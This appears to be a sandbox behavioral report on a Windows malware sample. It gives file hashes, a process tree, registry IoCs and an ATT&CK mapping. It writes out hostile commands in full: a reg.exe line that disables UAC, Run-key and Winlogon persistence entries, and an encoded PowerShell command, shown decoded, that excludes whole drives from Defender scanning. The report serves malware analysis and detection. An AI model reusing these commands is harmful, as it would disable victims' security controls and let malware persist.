Analysis
max time kernel: 143s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 13-04-2024 08:19
Static task: static1
Behavioral task: behavioral1
Sample: f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe
Resource: win10v2004-20240226-en
General
Target: f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe
Size: 118KB
MD5: 58250357e2818257885f8ab3321085c2
SHA1: edec3680ec5558bad5aaed1f8dd1f5f05f8243ca
SHA256: f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015
SHA512: d403ca7d62033f49e07ad05a144d59a83b81bede2d98d36284974741e72df56ee0dfbdd1d5ae7eac0587ad128b81f2c50da682b28115230e20e4afff2bf07b0e
SSDEEP: 3072:OVjUCVOwcSlBaTPbfM+6b4UGYTX7LX9MD:AjUWcegDbfMJ+A7j9
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
Processes: test.exe, JavaUpdate.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\AppData\\Roaming\\JavaUpdater\\JavaUpdate.exe\"" | test.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\AppData\\Roaming\\JavaUpdater\\JavaUpdate.exe\"" | JavaUpdate.exe
UAC bypass 2 IoCs (signature title recovered from the process tree below, where the same reg.exe actions are tagged "UAC bypass")
Processes: reg.exe, reg.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe, test.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | test.exe

Executes dropped EXE 2 IoCs
Processes: test.exe, JavaUpdate.exe
pid | process
3960 | test.exe
2804 | JavaUpdate.exe

Adds Run key to start application 2 TTPs 2 IoCs
Processes: test.exe, JavaUpdate.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\Users\\Admin\\AppData\\Roaming\\JavaUpdater\\JavaUpdate.exe\"" | test.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\Users\\Admin\\AppData\\Roaming\\JavaUpdater\\JavaUpdate.exe\"" | JavaUpdate.exe

Modifies WinLogon 2 TTPs 2 IoCs
Processes: test.exe, JavaUpdate.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\ | test.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\ | JavaUpdate.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Modifies registry key 1 TTPs 2 IoCs

Runs ping.exe 1 TTPs 1 IoCs

Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes: powershell.exe
pid | process
4104 | powershell.exe
4104 | powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes: powershell.exe
description | pid | process
Token: SeDebugPrivilege | 4104 | powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs
Processes: JavaUpdate.exe
pid | process
2804 | JavaUpdate.exe

Suspicious use of WriteProcessMemory 29 IoCs
Processes: f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe, test.exe, cmd.exe, cmd.exe, JavaUpdate.exe, cmd.exe
description | pid | process | target process | entries
PID 3016 wrote to memory of 4104 | 3016 | f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe | powershell.exe | 2
PID 3016 wrote to memory of 3960 | 3016 | f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe | test.exe | 3
PID 3960 wrote to memory of 1332 | 3960 | test.exe | cmd.exe | 3
PID 1332 wrote to memory of 5084 | 1332 | cmd.exe | reg.exe | 3
PID 3960 wrote to memory of 4488 | 3960 | test.exe | cmd.exe | 3
PID 4488 wrote to memory of 2500 | 4488 | cmd.exe | PING.EXE | 3
PID 4488 wrote to memory of 2804 | 4488 | cmd.exe | JavaUpdate.exe | 3
PID 2804 wrote to memory of 3448 | 2804 | JavaUpdate.exe | cmd.exe | 3
PID 2804 wrote to memory of 4060 | 2804 | JavaUpdate.exe | iexplore.exe | 3
PID 3448 wrote to memory of 2836 | 3448 | cmd.exe | reg.exe | 3
Processes (indentation shows the parent/child depth of the original tree)

C:\Users\Admin\AppData\Local\Temp\f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe"
- Checks computer location settings
- Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAaAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AeQB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAYwByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcABzACMAPgA="
  Decoded -EncodedCommand (base64 of UTF-16LE text; decoded during editing, not part of the sandbox output): <#yhz#>Add-MpPreference <#myz#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#ycr#> -Force <#zps#>
  The inline <# ... #> comments are padding; the effective command adds the whole user profile and system drive to the Microsoft Defender exclusion list.
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken

  C:\Users\Admin\AppData\Local\Temp\test.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\test.exe"
  - Modifies WinLogon for persistence
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Modifies WinLogon
  - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe
    Command line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\reg.exe
      Command line: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      - UAC bypass
      - Modifies registry key

    C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
    - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\PING.EXE
      Command line: PING 127.0.0.1 -n 2
      - Runs ping.exe

      C:\Users\Admin\AppData\Roaming\JavaUpdater\JavaUpdate.exe
      Command line: "C:\Users\Admin\AppData\Roaming\JavaUpdater\JavaUpdate.exe"
      - Modifies WinLogon for persistence
      - Executes dropped EXE
      - Adds Run key to start application
      - Modifies WinLogon
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe
        Command line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\reg.exe
          Command line: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          - UAC bypass
          - Modifies registry key

        C:\Program Files (x86)\Internet Explorer\iexplore.exe
        Command line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4280 --field-trial-handle=2328,i,5873823382323802923,13134441441264702821,262144 --variations-seed-version /prefetch:8
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Persistence
  Boot or Logon Autostart Execution (3)
    Registry Run Keys / Startup Folder (1)
    Winlogon Helper DLL (2)
Privilege Escalation
  Boot or Logon Autostart Execution (3)
    Registry Run Keys / Startup Folder (1)
    Winlogon Helper DLL (2)
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rwpkkmaj.2fy.ps1
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\install.bat
Filesize: 158B
MD5: 552f91e198b5402fad934b3c7a45b5c2
SHA1: 6c766bc9d51ba70a7769047e5ae107b798e4ed12
SHA256: 9c2b2133eb284e764155a96798efdff4e67e2ef38f9501ca4d9b066cfbf0da37
SHA512: 47128e082b7c541360e26968d9a009e38613da06ddfa14a288d90d8ca6efe8574b67d06673e52cff30d4967c42f0b871c8bd0db4b6f1b80c2db39b8d1ae1adaf

C:\Users\Admin\AppData\Local\Temp\test.exe
Filesize: 100KB
MD5: f3b7cddc98281485c9bcf40314a8cfa1
SHA1: a797b03d4f0aa176ac3c31509a612ff07c1a15d7
SHA256: 7baa3ae97c421ab54fa95d3fceca3f11900c7fc04970652400d803da18f22122
SHA512: 5b57a55bd40a4f57222312279989b2398bc472b57a4ca098cdbcc9456b168d9a2fefe54b3fc24ba9fcb1edb9ab60159e6887addda1285184bccb33d76010068a

Memory dumps
memory/3016-0-0x0000000000010000-0x0000000000034000-memory.dmp (Filesize: 144KB)
memory/3016-1-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmp (Filesize: 10.8MB)
memory/3016-2-0x000000001AC70000-0x000000001AC80000-memory.dmp (Filesize: 64KB)
memory/3016-32-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmp (Filesize: 10.8MB)
memory/4104-11-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmp (Filesize: 10.8MB)
memory/4104-12-0x00000266E1FA0000-0x00000266E1FB0000-memory.dmp (Filesize: 64KB)
memory/4104-22-0x00000266E4150000-0x00000266E4172000-memory.dmp (Filesize: 136KB)
memory/4104-24-0x00000266E1FA0000-0x00000266E1FB0000-memory.dmp (Filesize: 64KB)
memory/4104-27-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmp (Filesize: 10.8MB)